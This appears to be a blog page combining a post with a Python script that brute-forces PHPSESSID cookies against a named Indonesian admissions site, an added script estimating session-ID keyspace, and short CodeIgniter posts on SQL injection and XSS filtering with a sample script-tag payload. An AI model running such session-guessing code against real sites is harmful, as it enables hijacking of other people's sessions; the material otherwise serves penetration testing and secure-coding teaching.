Script-Kiddie: Session ID Bruteforce with Python

Last year, I got a task to do some penetration testing on ujian.sbmptn.or.id. This site was used for registration for Indonesia's National Selection for Public University Admission (Seleksi Bersama Masuk Perguruan Tinggi Negeri, SBMPTN). The first thing I did was to determine how this simple site reacts when it is passed a bogus session ID cookie (as I usually do).

Here is a small tool to accomplish this. To use it, first request the page with a deliberately wrong session ID, take the md5 checksum of the response body and put it in the CHECKSUM variable; the script then treats every response whose hash differs from it as a potential hit. Before that, analyse the format of the tested site's real session IDs (length and character set) so that the generator matches the site's pattern. This script generates 26 lowercase alphanumeric characters. Two caveats on that pattern: a 26-character lowercase alphanumeric PHPSESSID is what PHP emits with 5 bits per character (session.hash_bits_per_character = 5 in PHP 5, session.sid_bits_per_character = 5 in PHP 7.1 and later), and that alphabet is 0-9 and a-v only, so any guess containing w, x, y or z can never match; and 32^26 is about 2^130 possibilities, so random guessing only has a realistic chance when the IDs are far less random than their length suggests (sequential counters, time-seeded generators, short tokens).

import datetime
import hashlib
import http.client
import random
import string

# md5 checksum of the page the site returns for an unknown / invalid session ID
CHECKSUM = "f98a1ee2197ee3e880f235236285ff58"

# Site
server = "ujian.sbmptn.or.id"
address = "/login.php"

f_success = open("success_token", "a")
f_fail = open("fail_token", "a")

success = 0
fail = 0

def do_exploit(phpsessid):
    # "fail" is the counter used below; the original declared "fail_token",
    # which does not exist, so "fail = fail + 1" raised UnboundLocalError
    global success, fail
    conn = http.client.HTTPConnection(server, timeout=10)

    try:
        # Only the cookie name=value goes in a Cookie request header;
        # "path=/" is a Set-Cookie attribute and is ignored by the server
        conn.request("POST", address, "", {"Cookie": "PHPSESSID=" + phpsessid})
        time = str(datetime.datetime.now())
        resp = conn.getresponse()
        data = resp.read()

        # MD5 checksum of the response body
        result = hashlib.md5(data).hexdigest()
        if CHECKSUM == result:
            # Same page as for a bogus ID: this guess is not a live session
            fail = fail + 1
            f_fail.write(time + " " + phpsessid + "\n")
            f_fail.flush()
        else:
            # Anything else is a candidate; verify it by hand, because a page
            # with dynamic content (timestamp, CSRF token) also lands here
            success = success + 1
            f_success.write(time + " " + phpsessid + "\n")
            f_success.flush()

    except Exception as e:
        print("Something happened:", e)
    finally:
        conn.close()

while True:
    # 26 lowercase alphanumeric characters, the pattern this script assumes
    phpsessid = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(26))
    do_exploit(phpsessid)

When you run this script, check the file called "success_token" (f_success in the code). If anything lands there, you may have found a working session ID that you can replay. Since every response that does not match CHECKSUM is written to that file, verify each candidate by hand: a page whose content changes between requests (a timestamp, a CSRF token, a different error message) ends up there too.
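The advice above to analyse the session ID format before guessing can be turned into a small measurement. The following is an added example, not part of the original post or its script: given a sample of session IDs, it infers the length, the per-position alphabet and any fixed positions, puts a lower bound on the keyspace in bits, and shows what fraction of the script's 36-symbol guesses can never match an ID the target can emit. Both samples (PHP-style 26-character IDs over 0-9 and a-v, and a weak zero-padded counter) are constructed here with a seeded generator and are not captured from any site; the request rate and number of live sessions in the report are assumptions.

```python
import math
import random
import string

# The alphabet the script above guesses with (36 symbols) and the alphabet PHP
# uses for 5-bits-per-character session IDs (0-9 and a-v, 32 symbols).
GUESS_ALPHABET = string.ascii_lowercase + string.digits
PHP_5BIT_ALPHABET = string.digits + "abcdefghijklmnopqrstuv"
SID_LENGTH = 26

# Constructed sample: 200 IDs from a seeded generator that imitate what a PHP
# site would hand out. They are made up for this example, not real captures.
_rng = random.Random(2013)
SAMPLE_IDS = ["".join(_rng.choice(PHP_5BIT_ALPHABET) for _ in range(SID_LENGTH))
              for _ in range(200)]

# Constructed sample of a weak scheme: an 8-digit zero-padded counter that
# only ever reaches five digits (also made up for this example).
WEAK_IDS = ["%08d" % n for n in range(0, 100000, 7)]


def analyse_sids(ids):
    """Infer length, alphabet, fixed positions and a keyspace lower bound
    from a sample of session IDs."""
    lengths = {len(s) for s in ids}
    if len(lengths) != 1:
        raise ValueError("session IDs of mixed length: %r" % sorted(lengths))
    length = lengths.pop()
    per_pos = [{s[i] for s in ids} for i in range(length)]
    fixed = {i: next(iter(chars)) for i, chars in enumerate(per_pos) if len(chars) == 1}
    alphabet = set().union(*per_pos)
    # Each position contributes log2(distinct symbols seen there). A sample
    # can only under-count symbols, so for a uniform generator this is a lower
    # bound on the real keyspace; for a biased one (time-seeded, sequential)
    # it overstates the effective entropy, which is exactly what you hope for.
    bits = sum(math.log2(len(chars)) for chars in per_pos)
    return {"length": length, "alphabet": alphabet, "fixed": fixed, "bits": bits}


def wasted_fraction(guess_alphabet, observed_alphabet, length):
    """Fraction of uniform random guesses over guess_alphabet that contain at
    least one symbol the target never emits, i.e. guesses that cannot succeed."""
    usable = set(guess_alphabet) & set(observed_alphabet)
    return 1.0 - (len(usable) / len(set(guess_alphabet))) ** length


def expected_seconds_to_hit(bits, live_sessions, guesses_per_second):
    """Expected time for random guessing to land on any of live_sessions valid
    IDs in a keyspace of 2**bits at the given request rate."""
    return 2.0 ** bits / live_sessions / guesses_per_second


def report(ids, label, live_sessions=1000, guesses_per_second=100):
    """Print what the sample reveals; the session count and rate are assumptions."""
    info = analyse_sids(ids)
    wasted = wasted_fraction(GUESS_ALPHABET, info["alphabet"], info["length"])
    years = expected_seconds_to_hit(info["bits"], live_sessions, guesses_per_second)
    years /= 365 * 24 * 3600
    print("%s: length %d, alphabet %s, fixed positions %s"
          % (label, info["length"], "".join(sorted(info["alphabet"])), info["fixed"]))
    print("  keyspace lower bound %.1f bits; %.1f%% of 36-symbol guesses can never match;"
          " expected %.3g years to hit one of %d live sessions at %d req/s"
          % (info["bits"], 100 * wasted, years, live_sessions, guesses_per_second))
    return info


if __name__ == "__main__":
    report(SAMPLE_IDS, "PHP-style IDs")
    report(WEAK_IDS, "zero-padded counter")
```

On an engagement the sample comes from requesting the login page repeatedly without a cookie and recording each Set-Cookie header; a few hundred IDs are enough to see the alphabet and any fixed or slowly changing positions. If the lower bound comes out near the full length in bits and no position is fixed, random guessing is not the attack; look instead at how the IDs are seeded or whether the application accepts an attacker-chosen ID (session fixation).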

CodeIgniter: Two actions to prevent SQL Injection

In my previous post, I explained how to prevent XSS injection in your CodeIgniter apps. For those who are new to web programming, here is another kind of security hole in web programming which can be fatal because it exposes the inside of your application's database: SQL injection.


CodeIgniter: Apply the XSS filter as mandatory

If you are new to web programming and have no idea what XSS is, here is what it is: a kind of web application security hole that makes use of unsanitized input, so that an intruder can put JavaScript or HTML into it. Is that a big deal? Yes, of course, because when that input is printed back into a page, the browser interprets it as real JavaScript or HTML and executes it in the context of your site and of whoever is viewing the page.

Thankfully, CodeIgniter, a PHP application framework that is still gaining users, has a way to deal with it. It has an XSS filtering mechanism that sanitizes user input from GET, POST and cookie data. To turn it on for every request, open the CodeIgniter configuration file /application/config/config.php and edit this line:

$config['global_xss_filtering'] = TRUE;  # It is FALSE by default

Now if an adversary enters something like <script>alert(0);</script> into one of your application's inputs, it is converted to [removed]alert(0);[removed], so it is not interpreted as JavaScript.

But remember to stick with $this->input->post("variable") or $this->input->get("variable") when dealing with user input, and forget what you learned in your first PHP class ($_POST[] and $_GET[]): the framework's filtering is tied to the Input class, and values read straight from the superglobals are not guaranteed to have been through it. If you only want the filter on specific values, pass TRUE as the second argument, $this->input->post("variable", TRUE). One caveat a practitioner should keep in mind: xss_clean() is a pattern-based input filter, not a replacement for escaping output in the context where it is rendered (html_escape() in your views), and CodeIgniter 3 marks global_xss_filtering as deprecated for exactly that reason.